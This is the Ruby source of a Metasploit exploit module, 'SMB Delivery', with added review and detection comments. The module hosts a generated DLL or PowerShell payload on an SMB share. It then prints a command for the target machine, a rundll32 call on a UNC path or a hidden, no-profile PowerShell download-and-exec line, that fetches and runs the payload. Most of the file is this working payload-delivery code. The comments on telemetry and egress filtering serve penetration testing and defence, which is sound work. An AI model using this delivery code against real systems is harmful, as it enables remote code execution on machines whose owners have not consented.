GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/smb_delivery.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# "SMB Delivery" module: stores a generated payload in +file_contents+ and
# prints the command line that retrieves and runs it from the path returned
# by +unc+.
#
# +unc+, +file_contents=+, +cmd_psh_payload+, +generate_psh_command_line+ and
# +generate_payload_dll+ are not defined in this file; presumably they come
# from the three included Msf mixins -- confirm against the framework.
#
# Detection/mitigation view: the two command shapes printed by #primer are
# `rundll32.exe <UNC path>,0` and a PowerShell command line built with
# noprofile and a hidden window style. Process-creation telemetry for
# rundll32 given a remote UNC path, or for hidden/no-profile PowerShell, and
# egress filtering of SMB to untrusted hosts are the controls this
# delivery path has to get past.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Powershell

  # Declares the module metadata (two Windows targets, DLL and PSH, each for
  # x86 and x64; DLL is the default) and registers the FILE_NAME option.
  #
  # @param info [Hash] metadata passed through to +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMB Delivery',
        'Description' => %q{
        This module serves payloads via an SMB server and provides commands to retrieve
        and execute the generated payloads. Currently supports DLLs and Powershell.
      },
        'License' => MSF_LICENSE,
        'Author' => ['Andrew Smith', 'Russel Van Tuyl'],
        'References' => [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
        ],
        'Payload' => { 'Space' => 2048, 'DisableNops' => true },
        'Platform' => 'win',
        'Targets' => [
          ['DLL', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] }],
          ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] }]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2016-07-26',
        'DefaultTarget' => 0
      )
    )

    # The description text says "DLL file name"; how FILE_NAME is consumed is
    # not visible in this file.
    file_name_opt = OptString.new('FILE_NAME', [false, 'DLL file name', 'test.dll'])
    register_options([file_name_opt])
  end

  # Sets +file_contents+ for the selected target and prints the matching
  # command line. A target name other than 'PSH' or 'DLL' prints only the
  # status line and changes nothing.
  def primer
    print_status('Run the following command on the target machine:')

    selected = target.name
    if selected == 'PSH'
      self.file_contents = cmd_psh_payload(
        payload.encoded,
        payload_instance.arch.first,
        remove_comspec: true,
        wrap_double_quotes: true
      )

      fetch_and_exec = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
      # NOTE(review): ignore_cert is not defined anywhere in this file; it has
      # to resolve through an included mixin, otherwise this branch raises
      # NameError -- confirm.
      print_line generate_psh_command_line(
        noprofile: true,
        windowstyle: 'hidden',
        command: "#{ignore_cert}#{fetch_and_exec}"
      )
    elsif selected == 'DLL'
      self.file_contents = generate_payload_dll
      print_line("rundll32.exe #{unc},0")
    end
  end
end